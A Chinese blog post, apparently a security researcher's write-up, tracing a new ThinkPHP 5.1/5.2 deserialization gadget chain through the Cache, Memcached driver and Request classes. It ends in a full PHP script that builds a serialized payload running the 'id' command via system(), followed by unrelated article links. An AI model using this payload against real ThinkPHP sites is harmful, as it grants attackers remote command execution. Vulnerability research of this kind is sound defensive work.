ThinkPHP5.x另一条反序列化利用链

作者：G2602914553 | 来源：互联网 | 2023-09-04 22:32

前几天整体看完Laravel的POP链，顺便想看看Thinkphp的POP链，也有很多师傅都已经分析过了5.x和6.x的反序列化利用链。复现了一个5.1的POP链后，自己尝试挖掘了一下5.2的POP

前几天整体看完Laravel的POP链，顺便想看看Thinkphp的POP链，也有很多师傅都已经分析过了5.x和6.x的反序列化利用链。复现了一个5.1的POP链后，自己尝试挖掘了一下5.2的POP链，发现了一条对于5.1和5.2是通杀的POP链，并且和师傅们找的都不大相同，就把思路分享出来。

分析完了Laravel的，不得不说ThinkPHP可利用的初始类是真的少，__destruct和__wakeup也就那么几个，师傅们大多都是利用thinkprocesspipesWindows类的__destruct，后续再利用__toString继续寻找利用链。

POP链分析

我一开始就换了个初始类，最后在thinkCache找到了些苗头，利用它的__destruct函数。

跟进commit函数，$this->deferred是可控的，save函数参数也就是可控的。

再跟进save函数，$item完全可控，它必须是一个CacheItemInterface对象。

找到thinkcacheCacheItem类，发现$item->getKey(), $item->get(), $item->getExpire()都是可控的。

回到save函数，跟进set函数。

跟进init函数，可以看到，我们将$this->handler设置为任意对象他都会返回。

现在全局搜索含有set函数的类，在thinkcachedriverMemcached找到。

跟进其中的has函数，我们看到$this->handler又是可控的，又可以返回任意对象。

再全局搜索get函数，看到think/Request里面有，分析过最开始的5.1反序列化的POP链的人都知道，最后的RCE点就在这个类。get函数里有input函数，前两个参数完全可控。

进入input函数，想要进入下面的filterData函数且满足第一个参数可控

那么我们进入getData函数，我们知道$data和$name都是可控的，那么getData函数的返回也是可控的。

然后顺利进入filterData函数。

因为getFilter函数中的$this-filter可控，所以getFilter函数也是可控的。

最后进入filterValue函数，终于到了RCE的点了。

最后测试

namespace think{ class Cache{ protected $deferred; protected $handler; function __construct($Memcached, $CacheItem){ $this->handler = $Memcached; $this->deferred = array('' => $CacheItem); } } } namespace thinkcache{ class CacheItem{ protected $key; protected $value; protected $expire; function __construct($name, $value){ $this->key = $name; $this->value = $value; $this->expire = null; } } } namespace thinkcachedriver{ class Memcached{ protected $option; protected $handler; protected $tag = 1; protected $writeTimes = 0; function __construct($Request){ $this->handler = $Request; $this->option = array('prefix'=>''); } } } namespace think{ class Request { protected $filter; protected $get; protected $mergeParam; function __construct(){ $this->filter = "system"; $this->get = array("jrxnm"=>"id"); $this->mergeParam = true; } } } namespace{ $r = new thinkRequest(); $c = new thinkcacheCacheItem('jrxnm', ''); $m = new thinkcachedriverMemcached($r); $b = new thinkCache($m,$c); echo urlencode(serialize($b)); }

总结

找POP链是一个很有意思的事情，那种一环扣一环、利用PHP各种特性最后RCE的POP链是最让人拍案叫绝的。

推荐阅读

process
Linux进程控制块PCBtask_struct结构体结构及作用详解

本文详细介绍了Linux中进程控制块PCBtask_struct结构体的结构和作用，包括进程状态、进程号、待处理信号、进程地址空间、调度标志、锁深度、基本时间片、调度策略以及内存管理信息等方面的内容。阅读本文可以更加深入地了解Linux进程管理的原理和机制。 ... [详细]

蜡笔小新 2023-12-13 21:31:18
process
clone的fork与pthread_create创建线程有何不同

本文讨论了clone的fork与pthread_create创建线程的不同之处。进程是一个指令执行流及其执行环境，其执行环境是一个系统资源的集合。在调用系统调用fork创建一个进程时，子进程只是完全复制父进程的资源，这样得到的子进程独立于父进程，具有良好的并发性。但是二者之间的通讯需要通过专门的通讯机制，另外通过fork创建子进程系统开销很大。因此，在某些情况下，使用clone或pthread_create创建线程可能更加高效。 ... [详细]

蜡笔小新 2023-12-12 20:00:06
php
利用中间件模式简化代码逻辑

在编写业务代码时，常常会遇到复杂的业务逻辑导致代码冗长混乱的情况。为了解决这个问题，可以利用中间件模式来简化代码逻辑。中间件模式可以帮助我们更好地设计架构和代码，提高代码质量。本文介绍了中间件模式的基本概念和用法。 ... [详细]

蜡笔小新 2023-12-12 15:08:23
string
使用集算器将日志文件结构化，轻松使用SQL查询

本文介绍了一种轻巧方便的工具——集算器，通过使用集算器可以将文本日志变成结构化数据，然后可以使用SQL式查询。集算器利用集算语言的优点，将日志内容结构化为数据表结构，SPL支持直接对结构化的文件进行SQL查询，不再需要安装配置第三方数据库软件。本文还详细介绍了具体的实施过程。 ... [详细]

蜡笔小新 2023-12-11 13:27:46
python
Python程序安全运行的三个条件及预防措施

Python已成为全球最受欢迎的编程语言之一，然而Python程序的安全运行存在一定的风险。本文介绍了Python程序安全运行需要满足的三个条件，即系统路径上的每个条目都处于安全的位置、"主脚本"所在的目录始终位于系统路径中、若python命令使用-c和-m选项，调用程序的目录也必须是安全的。同时，文章还提出了一些预防措施，如避免将下载文件夹作为当前工作目录、使用pip所在路径而不是直接使用python命令等。对于初学Python的读者来说，这些内容将有所帮助。 ... [详细]

蜡笔小新 2023-12-09 10:20:23
python
基于dlib的人脸68特征点提取(眨眼张嘴检测)python版本

文章目录引言开发环境和库流程设计张嘴和闭眼的检测引言(1)利用Dlib官方训练好的模型“shape_predictor_68_face_landmarks.dat”进行68个点标定 ... [详细]

蜡笔小新 2023-12-12 13:27:42
process
Spring常用注解（绝对经典），全靠这份Java知识点PDF大全

本文介绍了Spring常用注解和注入bean的注解，包括@Bean、@Autowired、@Inject等，同时提供了一个Java知识点PDF大全的资源链接。其中详细介绍了ColorFactoryBean的使用，以及@Autowired和@Inject的区别和用法。此外，还提到了@Required属性的配置和使用。 ... [详细]

蜡笔小新 2023-12-12 10:15:07
string
代理模式的详细介绍及应用场景

代理模式是一种在软件开发中常用的设计模式，通过在客户端和目标对象之间增加一层中间层，让代理对象代替目标对象进行访问，从而简化系统的复杂性。代理模式可以根据不同的使用目的分为远程代理、虚拟代理、Copy-on-Write代理、保护代理、防火墙代理、智能引用代理和Cache代理等几种。本文将详细介绍代理模式的原理和应用场景。 ... [详细]

蜡笔小新 2023-12-10 19:07:21
python
Python工具安装教程及注意事项

本文介绍了在Windows系统下安装Python、setuptools、pip和virtualenv的步骤，以及安装过程中需要注意的事项。详细介绍了Python2.7.4和Python3.3.2的安装路径，以及如何使用easy_install安装setuptools。同时提醒用户在安装完setuptools后，需要继续安装pip，并注意不要将Python的目录添加到系统的环境变量中。最后，还介绍了通过下载ez_setup.py来安装setuptools的方法。 ... [详细]

蜡笔小新 2023-12-10 16:46:45
version
一个好东东，视频转换用MyVideoConverter

本文介绍了一个视频转换软件MyVideoConverter，该软件支持将mpg转换成swf格式，支持多种格式的转换，转换速度快，还能转换成3GP格式，同时具有音频分离提取功能。欢迎使用MyVideoConverter进行视频转换和音频提取。 ... [详细]

蜡笔小新 2023-12-10 13:35:18
process
微软评估和规划（MAP）的工具包介绍及应用实验手册

本文介绍了微软评估和规划（MAP）的工具包，该工具包是一个无代理工具，旨在简化和精简通过网络范围内的自动发现和评估IT基础设施在多个方案规划进程。工具包支持库存和使用用于SQL Server和Windows Server迁移评估，以及评估服务器的信息最广泛使用微软的技术。此外，工具包还提供了服务器虚拟化方案，以帮助识别未被充分利用的资源和硬件需要成功巩固服务器使用微软的Hyper - V技术规格。 ... [详细]

蜡笔小新 2023-12-10 11:24:55
uri
如何使用Python从工程图图像中提取底部的方法？

本文介绍了使用Python从工程图图像中提取底部的方法。首先将输入图片转换为灰度图像，并进行高斯模糊和阈值处理。然后通过填充潜在的轮廓以及使用轮廓逼近和矩形核进行过滤，去除非矩形轮廓。最后通过查找轮廓并使用轮廓近似、宽高比和轮廓区域进行过滤，隔离所需的底部轮廓，并使用Numpy切片提取底部模板部分。 ... [详细]

蜡笔小新 2023-12-10 10:48:49
uri
深入理解Java虚拟机的并发编程与性能优化

本文主要介绍了Java内存模型与线程的相关概念，探讨了并发编程在服务端应用中的重要性。同时，介绍了Java语言和虚拟机提供的工具，帮助开发人员处理并发方面的问题，提高程序的并发能力和性能优化。文章指出，充分利用计算机处理器的能力和协调线程之间的并发操作是提高服务端程序性能的关键。 ... [详细]

蜡笔小新 2023-12-09 19:52:01
uri
linux进阶50——无锁CAS

1.概念比较并交换(compareandswap，CAS)，是原⼦操作的⼀种，可⽤于在多线程编程中实现不被打断的数据交换操作࿰ ... [详细]

蜡笔小新 2023-12-09 10:10:40
string
Java多线程总结（8）concurrent.locks包下的锁机制的使用

1Lock与ReadWriteLock1.1LockpublicinterfaceLock{voidlock();voidlockInterruptibl ... [详细]

蜡笔小新 2023-12-09 09:15:17

G2602914553

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章